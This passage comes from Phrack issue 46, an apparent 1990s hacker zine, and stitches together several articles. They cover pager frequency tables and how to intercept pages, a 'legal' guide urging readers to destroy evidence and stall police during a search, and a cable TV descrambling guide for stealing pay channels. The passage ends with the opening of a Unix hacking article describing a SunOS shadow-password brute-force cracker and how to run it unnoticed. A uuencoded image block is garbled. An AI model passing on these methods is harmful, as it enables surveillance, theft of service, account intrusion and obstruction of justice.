it is. The 5 months I spent in jail was enough. I just started going
back to University of Texas, where they will only give me a VAX account
(lame). For the first time in 4 years, I think my life is going in
the 'right' direction.
I can only hope anyone who reads this will take this seriously.
Here's my advice: If you ever get arrested or even simply questioned about
ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement
official or whoever, "I'm sorry, I can't talk without my lawyer present"
Cooperating will never help you. Codec recently pointed out to me, that
we should be the "role models" of what people should do when they get
busted. Both of us remained loyal and quiet during our whole case. I was
in jail for 5 months, and Codec is still in prison, but we never talked.
Being narced on by a 'buddy' is the worst thing that could ever happen
to you, and narcing on a 'buddy' is the worst thing you could do to
them. If you get busted for something, don't pass the punishment on
to someone else. I hope most of you never have to face this, but if
you do, you will live much better knowing that you didn't give in to
a bunch of 'law enforcement' pricks.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 6 of 28
Think Federal District Court Judges and Special
Agents get to have all the fun?
Not any more!!
It's the Operation Sun Devil Home Game!
For the first step in the game, a quick flourish of a pen
signs away your opponent's rights to any expectations of
privacy. Bank records, medical records, employment
files, student records...literally anything is yours
for the taking.
As you progress through the various levels, you move on
to other legal scenarios like the application for search
warrant and the summons.
It's all here in the Operation Sun Devil Home game, by
Other game pieces available via ftp from freeside.com
in /pub/phrack/gailco.
Offer not sold in stores. Do not use.
Impersonating an officer of the court is a felony.
section 1 of uuencode 4.13 of file GAME.PCX by R.E.M.
begin 644 GAME.PCX
Processing - Please Wait
ACK [p 123
The checksum data came from:
STX 000 0010
1 011 0001
2 011 0010
3 001 0011
000 1101
A 100 0001
B 100 0010
C 100 0011
000 1101
ETX 000 0011
1 0111 1011
1 7 ; Get it? Get an ASCII chart and it will all make sense.
Note: Everything in the paging blocks, from STX to ETX inclusive are used
to generate the checksum. Also, this is binary data, guys...you can't
just type at the ID= prompt and expect to have it recognized as IXO.
It wants specific BITS. Got it? Just checking...
[Frequencies transmitting pager information are extremely easy to
identify while scanning. They identify each batch transmission
with a two-tone signal, followed by bursts of data. People with
scanners may tune into some of the following frequencies to
familiarize themselves with this distinct audio.]
Voice Pager Ranges: 152.01 - 152.21
453.025 - 453.125
454.025 - 454.65
462.75 - 462.925
Other Paging Ranges: 35.02 - 35.68
43.20 - 43.68
152.51 - 152.84
157.77 - 158.07
158.49 - 158.64
459.025 - 459.625
929.0125 - 931.9875
Austria 162.050 - 162.075 T,N,A
Australia 148.100 - 166.540 T,N,A
411.500 - 511.500 T,N,A
Canada 929.025 - 931-975 T,N,A
138.025 - 173.975 T,N,A
406.025 - 511.975 T,N,A
China 152.000 - 172.575 N,A
Denmark 469.750 N,A
Finland 450.225 T,N,A
146.275 - 146.325 T,N,A
France 466.025 - 466.075 T,N,A
Germany 465.970 - 466.075 T,N,A
173.200 T,N,A
Hong Kong 172.525 N,A
280.0875 T,N,A
Indonesia 151.175 - 153.050 A
Ireland 153.000 - 153.825 T,N,A
Italy 466.075 T,N,A
161.175 T,N
Japan 278.1625 - 283.8875 T,N
Korea 146.320 - 173.320 T,N,A
Malaysia 152.175 - 172.525 N,A,V
931.9375 N,A
Netherlands 156.9865 - 164.350 T,N,A
New Zealand 157.925 - 158.050 T,N,A
Norway 148.050 - 169.850 T,N,A
Singapore 161.450 N,A
931.9375 N,A
Sweden 169.8 T,N,A
Switzerland 149.5 T,N,A
Taiwan 166.775 N,A
280.9375 N,A
Thailand 450.525 N,A
172.525 - 173.475 N,A
UK 138.150 - 153.275 T,N,A
454.675 - 466.075 T,N,A
T = Tone
N = Numeric
A = Alphanumeric
V = Voice
For many years the interception of pages was not considered an
invasion of privacy because of the limited information provided
by the tone-only pagers in use at the time. In fact, when
Congress passed the Electronic Communications Privacy Act in 1986
tone-only pagers were exempt from its provisions.
According to the ECPA, monitoring of all other types of paging signals,
including voice, is illegal. But, due to this same law, paging
transmissions are considered to have a reasonable expectation to
privacy, and Law Enforcement officials must obtain a proper court
order to intercept them, or have the consent of the subscriber.
To intercept pages, many LE-types will obtain beepers programmed with
the same capcode as their suspect. To do this, they must contact
the paging company and obtain the capcode associated with the person
or phone number they are interested in. However, even enlisting
the assistance of the paging companies often requires following
proper legal procedures (warrants, subpoenas, etc.).
More sophisticated pager-interception devices are sold by a variety
of companies. SWS Security sells a device called the "Beeper Buster"
for about $4000.00. This particular device is scheduled as
a Title III device, so any possession of it by someone outside
a law enforcement agency is a federal crime. Greyson Electronics
sells a package called PageTracker that uses an ICOM R7100
in conjunction with a personal computer to track and decode pager
messages. (Greyson also sells a similar package to decode
AMPS cellular messages from forward and reverse channels called
For the average hacker-type, the most realistic and affordable option
is the Universal M-400 decoder. This box is about 400 bucks and
will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never
seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF,
takes audio input from any scanners external speaker jack, and
is probably the best decoder available to the Hacker/HAM for the price.
Output from the M400 shows the capcode followed by T, N or A (tone, numeric
or alpha) ending with the message sent. Universal suggests hooking
the input to the decoder directly to the scanner before any de-emphasis
circuitry, to obtain the true signal. (Many scanners alter the audio
before output for several reasons that aren't really relevant to this
article...they just do. :) )
Obviously, even by viewing the pager data as it streams by is of little
use to anyone without knowing to whom the pager belongs to. Law Enforcement
can get a subpoena and obtain the information easily, but anyone else
is stuck trying to social engineer the paging company. One other alternative
works quite well when you already know the individuals pager number,
and need to obtain the capcode (for whatever reason).
Pager companies will buy large blocks in an exchange for their customers.
It is extremely easy to discover the paging company from the phone number
that corresponds to the target pager either through the RBOC or by paging
someone and asking them who their provider is when they return your call.
Once the company is known, the frequencies allocated to that company
are registered with the FCC and are public information. Many CD-ROMs
are available with the entire FCC Master Frequency Database.
(Percon sells one for 99 bucks that covers the whole country -
716-386-6015) Libraries and the FCC itself will also have this information
With the frequency set and a decoder running, send a page that will be
incredibly easy to discern from the tidal wave of pages spewing
forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...)
It will eventually scroll by, and presto! How many important people
love to give you their pager number?
With the advent of new technologies pagers will become even more
present in both our businesses and private lives. Notebook computers
and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
Some of these cards have actual screens that allow for use without the
computer, but most require a program to pull message data out. These
cards also have somewhat large storage capacity, so the length of
messages have the option of being fairly large, should the service
provider allow them to be.
With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
can expect to receive usable computer data such as spreadsheet
entries, word processing documents, and of course, GIFs. (Hey, porno
entrepreneurs: beeper-porn! Every day, you get a new gif sent to your
pagecard! Woo Woo. Sad thing is, it would probably sell.)
A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A
Roaming Computer) was one of the first to allow for such broadcasts.
EMBARC makes use of a proprietary Motorola protocol, rather than
POCSAG, so subscribers must make use of either a Motorola NewsStream
pager (with nifty serial cable) or a newer PCMCIA pager. Messages are
sent to (and received by) the user through the use of special client
The software dials into the EMBARC message switch accessed through
AT&T's ACCUNET packet-switched network. The device itself is used
for authentication (most likely its capcode or serial number)
and some oddball protocol is spoken to communicate with the switch.
Once connected, users have the option of sending a page out, or
retrieving pages either too large for the memory of the pager, or
from a list of all messages sent in the last 24 hours, in case the
subscriber had his pager turned off.
Additionally, the devices can be addressed directly via x.400
addresses. (X.400: The CCITT standard that covers email address
far too long to be worth sending anyone mail to.) So essentially,
any EMBARC customer can be contacted from the Internet.
MTEL, the parent company of the huge paging service SkyTel, is
implementing what may be the next generation of paging technologies.
This service, NWN, being administrated by MTEL subsidiary Destineer,
is most often called 2-way paging, but is more accurately Narrowband-PCS.
The network allows for the "pager" to be a transceiver. When a page
arrives, the device receiving the page will automatically send back
an acknowledgment of its completed reception. Devices may also
send back some kind of "canned response" the user programs. An example
might be: "Thanks, I got it!" or "Why on Earth are you eating up my
allocated pages for the month with this crap?"
MTEL's service was awarded a Pioneers Preference by the FCC, which gave them
access to the narrowband PCS spectrum before the auctions. This is a big
deal, and did not go unnoticed by Microsoft. They dumped cash into the
network, and said the devices will be supported by Chicago. (Yeah,
along with every other device on the planet, right? Plug and Pray!)
The network will be layed out almost identically to MTEL's existing paging
network, using dedicated lines to connect towers in an area to a central
satellite up/downlink. One key difference will be the addition of
highly somewhat sensitive receivers on the network, to pick up the ACKs
and replies of the customer units, which will probably broadcast at
about 2 or 3 watts. The most exciting difference will be the
speed at which the network transmits data: 24,000 Kbps. Twenty-four
thousand. (I couldn't believe it either. Not only can you get your
GIFs sent to your pager, but you get them blinding FAST!) The actual
units themselves will most likely look like existing alphanumeric pagers
with possibly a few more buttons, and of course, PCMCIA units will
be available to integrate with computer applications.
Beyond these advancements, other types of services plan on offering
paging like features. CDPD, TDMA & CDMA Digital Cellular and ESMR
all plan on providing a "pager-like" option for their customers.
The mere fact that you can walk into a K-Mart and buy a pager
off a rack would indicate to me that pagers are far to ingrained into
our society, and represent a wireless technology that doesn't scare
or confuse the yokels. Such a technology doesn't ever really go away.
Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_,
p. 8, July, 1994.
O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.
O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 9 of 28
Legal Info
by Szechuan Death
OK. This document applies only to United States citizens: if
you are a citizen of some other fascist country, don't come whining
to me when this doesn't work..... :)
Make no mistake: I'm not a lawyer. I've merely paid
attention and picked up some facts that might be useful to me along
the way. There are three subjects that it pays to have a knowledge
of handy: prescription drugs, medical procedures, and legal facts.
While these may all be boring as hell, they can certainly pull your
ass out of the fire in a pinch.
Standard disclaimer: I make no claims about this document or
facts contained therein. I also make no claims about their legal
authenticity: if you want to be 100% sure, there's a library in
damn near every town, LOOK IT UP!
One more thing: This document is useful for virtually
ANYTHING. It's effectiveness stretches far beyond computer hacking
(although it's worn a bit thin for serious crimes, as every cretin
on Death Row has tried it already.....:)
OK. Let's say, just for the sake of argument, that you've
decided to take a walk along the wild side and do something
illegal. For our purposes, let's say computer hacking (imagine
that). There are many things you can do cover your legal ass,
should your activities come to the attention of any of our various
friendly law-enforcement agencies nationwide.
-- Part 1: Police Mentality
You must understand the police, if you ever want to be able to
thwart them and keep your freedom. Most police, to survive in
their jobs, have developed an "Us vs. Them" attitude, which we
should tolerate (up to a point). They use this attitude to justify
their fascist tactics. "Us" is the police, a brotherhood that
keeps the peace, always does right, and never snitches on each
other, no matter what the cause. "Them" is the rest of the
population. If "They" are not guilty of a specific crime, they
must have done something else, and they're doing their damndest to
avoid getting caught. In addition, many police have cultivated an
attitude similar to that of a 15-year-old high school punk: "I'm
bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc.
Unfortunately, these people have weapons and the authority to
support that attitude. Therefore, if the police come to your
house, be EXTREMELY polite and subservient; now is not the time to
start spouting your opinion about the police state in America
adding a charge of "Resisting Arrest" and/or "Assaulting an
Officer", it can get very dangerous. The police have been trained
in a number of suspect-control techniques, most of which involve
twisting body parts at unnatural angles. As if this weren't
enough, almost all police carry guns. Start fighting and you'll
get a couple broken bones, torn ligaments, or worse, a few bullet
wounds (possibly fatal). So remember, be very meek. Show them
that you are cowed by their force and their blustering presence,
and this will save you a black eye or two on the way down to the
station (from tripping and falling, of course).
-- Part 2: Hacker's Security
CARDINAL RULE #1: Get rid of the evidence. No evidence = no
case for the prosecutor. The Novice Hacker's Guide from LOD has an
excellent way to put this:
VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law.
It doesn't hurt to store everything encrypted on your hard disk, or
keep your notes buried in the backyard or in the trunk of your car. You
may feel a little funny, but you'll feel a lot funnier when you when you
meet Bruno, your transvestite cellmate who axed his family to death.
Basic hints:
Hide all your essential printouts, or burn them if they're trash
(remember: police need no warrant to search your trash). Encrypt
the files on your hard drive with something nasty, like PGP or RSA.
Use a file-wiper, NOT delete, to get rid of them when you're done.
And WIPE, don't FORMAT, your floppies and other magnetic media
(better still, degauss them). With a little common sense and a bit
of effort, a great deal of legal headaches can be avoided.
-- Part 3A: Polite Entry
Next part. You and your friends are enjoying an evening of
trying to polevault the firewall on whitehouse.com, when suddenly
you hear a knock at the door. Opening the door, you find a member
of the local police force standing outside, asking if he can come
in and ask you some questions. Now, here's where you start to piss
your pants. If you were smart, you'll have arranged something
beforehand where your friends (or, if there ARE no friends present,
an automatic script) are getting rid of the evidence as shown in
part 2. If you have no handy means of destroying the data
(printouts, floppies, tapes, etc.), throw the whole mess into
the bathtub, soak it in lighter fluid, and torch it. It's a
helluva mess to clean up, but nothing compared to latrine duty at
your nearest federal prison.
While the evidence is being destroyed, you're stalling the
police. Ask to see their search warrant and IDs. Mull over each
and every one of them for at least 5 minutes. If they have none,
start screaming about your 4th Amendment rights. Most importantly:
DON'T INVITE THEM IN. They're like vampires: if you let them in,
you're fucked. If they see anything even REMOTELY incriminating,
that constitutes probable cause for a search and they'll be
swarming all over your house like flies on shit. (And guess what!
It's legal, because YOU LET THEM IN!) Now, be aware that this
won't stall them forever: they can simply wait outside the house
and radio in a request for a search warrant, which will probably be
signed by the judge on duty at that time. Remember: "If you're
not willing to be searched, you MUST have something to hide!" If
there are no friends assisting you, as shown above, USE THIS TIME
EFFECTIVELY. When they get the warrant signed, that will be too
late, because you'll have erased/shredded/burned/hidden/etc. all
the incriminating evidence.
-- Part 3B: And Suddenly, The Door Burst In
Now, if the police already have a search warrant, they don't
need to knock on the door. They can simply kick the door down and
waltz in. If you're there at the time, you CAN try and stall them
as shown above, by asking to see their search warrant and IDs.
This may not work now, because they have you cold, hard, and dead
to rights. And, if anything incriminating is in a place where they
can find it, you're fucked, because it WILL be used as evidence.
But this won't happen to you, because you've already put everything
you're not using right at the moment in a safe, HIDDEN, place.
This leaves the computer. If you hear them kicking the door
in, keep calm, and run a script you've set up beforehand to low-
level-format the drive, wipe all hacking files, encrypt the whole
thing, etc. If there's any printouts or media hanging out, try and
hide them (probably worthless anyway, but worth a try). The name
of the game now is to minimize the damage that can be done to you.
The less hard evidence linking you to the "crime", the less of a
case the prosecutor will have and the better off you'll be.
-- Part 4: The Arrest
Now is the time to kick all your senses into hyper-record
mode. For you to get processed through the system without a hitch,
the arrest has to go perfectly, by the numbers. One small slip and
you're out through a loophole. Now, the police are aware of this
and will be doing their best to see that doesn't happen, but you
may get lucky all the same. First of all: According to the
Miranda Act, the police are REQUIRED BY LAW to read you your rights
and make sure you understand them. Remember EVERY WORD THEY SAY TO
YOU. If they don't say it correctly, you may be able to get off on
a technicality.
CARDINAL RULE #2: You have the right to remain silent.
EXERCISE IT. This cannot be stressed enough. If you need a
reminder, listen to the first part of the Miranda Warning:
"You have the right to remain silent. If you give up that
Nice ring to it, hmm? The only words coming out of your mouth
at this point should be "I'd like to speak to my attorney, please"
and, if applicable in your area, "I'd like to make a phone call,
please" (remember the "please's," see part #1 above) Nothing
else. There are tape recorders, video cameras, PLUS the word of a
dozen police officers to back it all up. How's that for an array
of damning evidence against you?
Then, after the ride downtown, you'll be booked and probably
asked a few questions. Say nothing. You're probably pissing your
pants with fear at this point, and may be tempted to roll over on
everyone you ever shook hands with in your whole life, but keep
your calm, and KEEP QUIET. Keep asking for your attorney and/or a
phone call, no matter WHAT threats/deals/etc. they make to you.
Remember, they can't legally interrogate you without your attorney
present. You may also be tempted to show your mettle at this
point, and give them false information, but remember one thing: If
you lie to them, you can be convicted of perjury (a nasty offense
itself). The best policy here is NSA: Never Say Anything.
Remember, you never have to keep track of what you've said, or have
to worry about having it used against you, if you've said NOTHING.
-- Part 5: The Trial
Here, we'll assume you've been arrested, booked, let out on
bail, indicted on X counts of so-and-so, etc. You're now in the
system. CARDINAL RULE #3: Get the best criminal defense attorney
you can afford, preferably one with some background in the crime
you've committed. No, scratch that: make that the best criminal
defense attorney, PERIOD. It's a helluva lot better to spend 5
years working at McDonald's 12 hours a day to pay back your legal
fee, than it is to spend 5 years in the slammer getting pimped out
nightly for a pack of menthols. Also, pay attention during the
trial. Remember, the defense attorney is working for YOU: it's
YOUR life they're deciding, so give him every bit of information
and help you can. You're paying him to sort it out for you, but
you should still keep an eye on things: if, in the middle of a
trial, something happens (you get a killer idea, or want to jump up
and scream "BULLSHIT!"), TELL HIM! It very well might be useful!
Also, have him nitpick every single thing for loopholes,
technicalities, civil rights violations, etc. It's worth it if it
pays off.
Another important thing is to look good. Image is everything.
Although you might prefer to wear heavily stained rock-band T-
shirts, leather jackets, ratty jeans, etc. in real life, that will
be EXTREMELY damning in the eyes of the judge/jury. They say that
clothes make the man, and in this case it's REALLY true: get a
suit, comb/cut your hair, shave, etc. Make yourself look like a
"positively respectable darling" in the eyes of the court! It'll
pay off for you. (hey, it worked for Eric and Lyle Menendez)
-- Part 8: The Prison
If you're here, you're totally fucked. Unless, by divine
intervention, your conviction is overturned on appeal, you'd better
clear up the next 5 years on your calendar. Apparently, you didn't
read closely enough, so read this every day during your long stay
in prison, and you'll be better equipped next time (assuming there
IS a next time..... :)
Remember the cardinal rules: 1) Don't leave evidence around
to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best
attorney available. If you remember these, and exercise some common
sense and a lot of caution, you should have no problem handling any
legal problems that come up.
Note: This is intended to be used as a handbook for defense
from minor crimes ONLY (hacking, DWI, etc.) If you're a career
criminal, or you've murdered or raped somebody, you're scum, and at
least have the grace to plead "guilty". Don't waste the tax-
payers' time and money with fancy legal footwork.
Please feel free to add anything or correct this document.
However, if you DO add or correct something, PLEASE make sure it's
true, and PLEASE email me the changes so I can include them in the next
revision of the document. My address is pstlb@acad3.alaska.edu. Happy
hacking to all, and if this helps you avoid getting caught, so much the
better. :)
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 10 of 28
/* A Guide to Porno Boxes */
/* by Carl Corey */
Keeping with tradition, and seeing that this is the first article in
Phrack on cable TV descrambling, any illegal box for use in descrambling
cable television signals is now known as a PORNO BOX.
There are many methods that cable companies use to insure that you get
what you pay for - and _only_ what you pay for. Of course, there are
always methods to get 'more than you pay for'. This file will discuss
the most important aspects of these methods, with pointers to more
detailed information, including schematics and resellers of equipment.
Part I. How the cable company keeps you from getting signals
A brief history
---Older Systems---
Most scrambling methods are, in theory, simple. The original method
used to block out signals was the trap method. All traps remove signals
that are sent from the CATV head end (the CATV company's station). The
first method, which is rarely used anymore was the negative trap.
Basically, every point where the line was dropped had these traps, which
removed the pay stations from your signal. If you decided to add a pay
station, the company would come out and remove the trap. This method was
pretty secure - you would provide physical evidence of tampering if you
climbed the pole to remove them or alter them (sticking a pin through
them seemed to work randomly, but could affect other channels, as it
shifts the frequency the trap removes.) This was a very secure system,
but did not allow for PPV or other services, and required a lot of
physical labor (pole-climbers aren't cheap). The only places this is
used anymore is in an old apartment building, as one trip can service
several programming changes. Look for a big gray box in the basement
with a lot of coax going out. If you are going to give yourself free
service, give some random others free service to hide the trail.
The next method used was termed a positive trap. With this method, the
cable company sends a _very_ strong signal above the real signal. A
tuner sees the strong signal, and locks onto the 'garbage' signal. A
loud beeping and static lines would show up on the set. For the CATV
company to enable a station, they put a 'positive' trap on the line,
which (despite the name) removes the garbage signal. Many text files
have been around on how to descramble this method (overlooking the
obvious, buying a (cheap) notch filter), ranging from making a crude
variable trap, to adding wires to the cable signal randomly to remove the
signal. This system is hardly used anymore, as you could just put a trap
inside your house, which wouldn't be noticed outside the house.
---Current Systems---
The next advent in technology was the box. The discussion of different
boxes follows, but there is one rather new technology which should be
discussed with the traps. The addressable trap is the CATV's dream. It
combines the best features of the negative trap (very difficult to tamper
with without leaving evidence) with features of addressable boxes (no
lineman needs to go out to add a service, computers can process Pay Per
View or other services). Basically, a 'smart trap' sits on the pole and
removes signals at will. Many systems require a small amp inside the
house, which the cable company uses to make sure that you don't hook up
more than one TV. I believe that the new CATV act makes this illegal,
and that a customer does not have to pay for any extra sets (which do not
need equipment) in the house. Of course, we all know that the cable TV
company will do whatever it wants until it is threatened with lawsuits.
Cable boxes use many different methods of descrambling. Most are not in
use anymore, with a few still around, and a few around the corner in the
future. The big thing to remember is sync suppression. This method is
how the cable companies make the picture look like a really fucked up,
waving Dali painting. Presently the most popular method is the Tri-mode
In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10
dB. The sync can be changed randomly once per field, and the information
necessary for the box to rebuild a sync signal. This very common system
is discussed in Radio-Electronics magazine in the 2/87 issue. There are
schematics and much more detailed theory than is provided here.
The other common method currently used is SSAVI, which is most common on
Zenith boxes. It stands for Sync Suppression And Video Inversion. In
addition to sync suppression, it uses video inversion to also 'scramble'
the video. There is no sync signal transmitted separately (or reference
signal to tell the box how to de-scramble) as the first 26 lines (blank,
above the picture) are not de-synched, and can be re-synched with a
phased lock loop - giving sync to the whole field. The data on inversion
is sent somewhere in the 20 or 21st line, which is outside of the
screen. Audio can be scrambled too, but it is actually just moved to a
different frequency. Radio Electronics August 92 on has circuits and
other info in the Drawing Board column.
---Future Systems-
For Pioneer, the future is now. The system the new Pioneers use is
patented and Pioneer doesn't want you to know how it works. From the
patent, it appears to use combinations of in-band, out-band, and keys
(also sending false keys) to scramble and relay info necessary to
descramble. These boxes are damn slick. The relevant patents are US
#5,113,411 and US #4,149,158 if you care to look. There is not much
information to be gained from them. Look for future updates to this
article with info on the system if I can find any :)
Other systems are the VideoCipher + (used on satellites now - this is
scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are
similar, with Digi encrypting the video with DES also (yikes)... And
they all use changing keys and other methods. Oak Sigma converters use
similar methods which are available now on cable. (digital encryption of
audio, etc...)
Part II. How the cable company catches you getting those signals
There are many methods the CATV company can use to catch you, or at
least keep you from using certain methods.
Market Code: Almost _all_ addressable decoders now use a market code.
This is part of the serial number (which is used for pay
per view addressing) which decodes to a general geographic
region. Most boxes contain code which tell it to shut
down if it receives a code (which can be going to any box
on the cable system) which is from a different market area.
So if you buy a converter that is say, market-coded for
Los Angeles, you won't be able to use it in New York.
Bullets: The bullet is a shut down code like above - it will make
your box say 'bAh' and die. The method used most is for
the head end to send messages to every box they know of
saying 'ignore the next shutdown message' ... and once
every (legit) box has this info, it sends the bullet.
The only boxes that actually process the bullet are ones
which the CATV system doesn't know about. P.S. Don't
call the cable company and complain about cable if you
are using an illegal converter - and be sure to warn
anyone you live with about calling the CATV co. also.
Leak Detection: The FCC forces all cable companies to drive around and
look for leaks - any poor splice jobs (wiring your house
from a neighbors without sealing it up nice) and some
descramblers will emit RF. So while the CATV is looking
for the leaks, they may catch you.
Free T-Shirts: The cable company can, with most boxes, tell the box to
display a different signal. So they can tell every box
they know of (the legit box pool) to display a commercial
on another channel, while the pirate boxes get this real
cool ad with an 1800 number for free t-shirts... you call,
you get busted. This is mostly done during PPV boxing or
other events which are paid for - as the company knows
exactly who should get that signal, and can catch even
legit boxes which are modified to receive the fight.
Your Pals: Programs like "Turn in a cable pirate and get $100" let
you know who your friends _really_ are.
Part III: How to get away with it.
I get a lot of questions about opening a box that you own. This is not
a good idea. Most, if not ALL boxes today have a tamper sensor. If you
open the box, you break a tab, flip a switch, etc... This disables the
box and leaves a nice piece of evidence for the CATV co. to show that you
played with it.
I also have had questions about the old "unplug the box when it is
enabled, then plug it back in later"... The CATV company periodically
sends a signal to update all the boxes to where they should be. If you
want to do this, you'll need to find out where the CATV sends the address
information, and then you need to trap it out of the signal. So as soon
as the fraudulent customer (let's call him Chris) sees his box get the
signal to receive the PPV porn channel, he installs the trap and now his
box will never get any pay per view signals again... but he'll always
have whatever he was viewing at the time he put the trap in. Big problem
here is that most _newer_ systems also tell the box how long it can
descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3
hours have passed"...
Where to make/buy/get porno boxes:
You can order a box which has been modified not to accept bullets. This
method is pretty expensive. You can also get a 'pan' descrambler - it is
a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and
descrambles it. These boxes can't be killed by the bullets, and work
pretty well. There are some pans which are made by the same company as
your cable box and are sensitive to bullets, so beware.
There are two basic ideas for modifying a box (provided you get detailed
instructions on how to get it open, or how to fix it once you open it).
You can change the S/N to something which is known as 'universal' or
disassemble the code and remove the jump to the shutdown code.
The universal codes are rare, and may be extinct. Besides, if the cable
company finds out your code, they can nuke it. This happens when someone
who makes (err made) 'universal' chips gets busted. The modification of
the actual code is the best way to do it, just forcing a positive
response to permission checks is the easiest way.
A 'cube' is not a NeXT, it's a device which removes the data signal from
the cable line, and inserts a 'nice' data signal which tells your box to
turn everything on. A 'destructive' cube actually re-programs all the
boxes below it to a new serial number and gives that number full
privileges, while a 'non-destructive' cube needs to know your boxes
serial number, so it can tell your box (without modifications) that it
can view everything. You have to get a new IC if you change boxes, but
the plus is that you can remove the cube and the box functions as
normal. Then again, you have to trust the place you are ordering the
cube from to not be working for the cable company, as you have to give
them your box serial number - which the CATV cable has in their records.
Cubes have been seen for sale in the back of Electronics Now (formerly
Radio Electronics).
Of course, you could check in the above mentioned articles and build
circuitry, it would be a lot cheaper. The only problem is that you have
to be good enough not to fuck it up - TV signals are very easy to fuck up.
Then there is the HOLY GRAIL. Most scrambling systems mess with the sync
pulse. This pulse is followed by the colorburst signal on NTSC video.
Basically, the grail finds the colorburst and uses it as a reference
signal. In theory, it works wonderfully (but does not fix the video
inversion problems found on SSAVI systems). However, with the sync pulse
whacked, the colorburst method may give weak color or color shifts. The
schematics are in the May 1990 Radio-Electronics. I have also received
email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is
a modified (supposedly higher quality) version of the R-E schematics.
The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and
etched board. A little steep, but not too bad. E-mail the above for
more information.
Anyway, that's all for now. Remember, information (including XXX movies)
wants to be free!
Carl Corey / dEs
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 11 of 28
* Unix Hacking Tools of the Trade *
* *
* By *
* *
* The Shining/UPi (UK Division) *
Disclaimer :
The following text is for educational purposes only and I strongly suggest
that it is not used for malicious purposes....yeah right!
Introduction :
Ok, I decided to release this phile to help out all you guys who wish to
start hacking unix. Although these programs should compile & run
on your system if you follow the instructions I have given, knowing a bit
of C will come in handy if things go wrong. Other docs I suggest you read
are older 'phrack' issues with shooting sharks various articles on unix,
and of course, 'Unix from the ground up' by The Prophet.
This article includes three programs, a SUNOS Brute force Shadow password
file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
Shadow Crack
SUNOS Unix brute force shadow password file cracker
Well, a while back, I saw an article in phrack which included a brute force
password cracker for unix. This was a nice idea, except that these days
more and more systems are moving towards the shadow password scheme. This,
for those of you who are new to unix, involves storing the actual encrypted
passwords in a different file, usually only accessible to root. A typical
entry from a System V R4 password file looks like this :-
root:x:0:1:Sys. admin:/:/bin/sh
with the actual encrypted password replaced by an 'x' in the /etc/passwd
file. The encrypted password is stored in a file(in the case of sysV)
called /etc/shadow which has roughly the following format :-
this includes the login i.d., the encrypted password, and various other
fields which hold info on password ageing etc...(no entry in the other
fields indicate they are disabled).
Now this was fine as long as we stayed away from system V's, but now a
whole load of other companies have jumped on the bandwagon from IBM (aix)
to Suns SUNOS systems. The system I will be dealing with is SUNOS's
shadowed system. Now, like sysV, SUNOS also have a system whereby the
actual encrypted passwords are stored in a file usually called
/etc/security/passwd.adjunct, and normally this is accessible only by root.
This rules out the use of brute force crackers, like the one in phrack
quite a while back, and also modern day programs like CRACK. A typical
/etc/passwd file entry on shadowed SUNOS systems looks like this :-
root:##root:0:1:System Administrator:/:/bin/csh
with the 'shadow' password file taking roughly the same format as that of
Sys V, usually with some extra fields.
However, we cannot use a program like CRACK, but SUNOS also supplied a
function called pwdauth(), which basically takes two arguments, a login
name and decrypted password, which is then encrypted and compared to the
appropriate entry in the shadow file, thus if it matches, we have a valid
i.d. & password, if not, we don't.
I therefore decided to write a program which would exploit this function,
and could be used to get valid i.d's and passwords even on a shadowed
To my knowledge the use of the pwdauth() function is not logged, but I could
be wrong. I have left it running for a while on the system I use and it has
attracted no attention, and the administrator knows his shit. I have seen
the functions getspwent() and getspwnam() in Sys V to manipulate the
shadow password file, but not a function like pwdauth() that will actually
validate the i.d. and password. If such a function does exist on other
shadowed systems then this program could be very easily modified to work
without problems.
The only real beef I have about this program is that because the
pwdauth() function uses the standard unix crypt() function to encrypt the
supplied password, it is very slow!!! Even in burst mode, a password file
with 1000's of users could take a while to get through. My advice is
to run it in the background and direct all its screen output to /dev/null
like so :-
shcrack -mf -uroot -ddict1 > /dev/null &
Then you can log out then come back and check on it later!
The program works in a number of modes, all of which I will describe below,
is command line driven, and can be used to crack both multiple accounts in
the password file and single accounts specified. It is also NIS/NFS (Sun
Yellow Pages) compatible.
How to use it
shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file]
Usage :-
-m[mode] there are 3 modes of operation :-
-mb Burst mode, this scans the password file, trying the minimum number
of password guessing strategies on every account.
-mi Mini-burst mode, this also scans the password file, and tries most
password guessing strategies on every account.
-mf Brute-force mode, tries all password strategies, including the use
of words from a dictionary, on a single account specified.
more about these modes in a sec, the other options are :-
-p[password file] This is the password file you wish to use, if this is
left unspecified, the default is /etc/passwd.
NB: The program automatically detects and uses the
password file wherever it may be in NIS/NFS systems.
-u[user id] The login i.d. of the account you wish to crack, this is used
in Brute-force single user mode.
-d[dict file] This uses the words in a dictionary file to generate
possible passwords for use in single user brute force
mode. If no filename is specified, the program only uses the
password guessing strategies without using the dictionary.
-mb Burst mode basically gets each account from the appropriate password
file and uses two methods to guess its password. Firstly, it uses the
account name as a password, this name is then reversed and tried as a
possible password. This may seem like a weak strategy, but remember,
the users passwords are already shadowed, and therefore are deemed to
be secure. This can lead to sloppy passwords being used, and I have
came across many cases where the user has used his/her i.d. as a
-mi Mini-burst mode uses a number of other password generating methods
as well as the 2 listed in burst mode. One of the methods involves
taking the login i.d. of the account being cracked, and appending the
numbers 0 to 9 to the end of it to generate possible passwords. If
